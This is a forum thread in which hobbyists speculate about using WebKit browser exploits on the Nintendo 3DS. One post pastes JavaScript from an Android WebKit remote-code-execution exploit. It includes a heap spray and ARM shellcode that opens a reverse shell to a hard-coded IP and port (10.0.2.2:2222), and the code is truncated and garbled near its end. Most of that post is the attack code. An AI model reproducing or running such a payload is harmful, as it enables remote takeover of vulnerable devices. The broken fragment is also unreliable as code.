pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though
yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits
Sorry to be pessimistic, but:
1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...
2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...
3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
It's a custom job that uses very large chunks of arm 9. Arm 9 is in all kinds of android phones and tablets. Any android exploits for webkit?
Yup They even allow remote code execution. Will that work on the 3ds? Probably not but it does give a general idea of where vulnerabilities may lie and the methodlogies that should be used. BTW that exploit uses javascript. Here is the code for those who are interested.
function heap()
{
var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };
var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate
do
{
scode += scode;
scode2 += scode2;
} while (scode.length250){
// alert("freeze");
nodes[0].textContent}
}
}, 0);
}
[/p]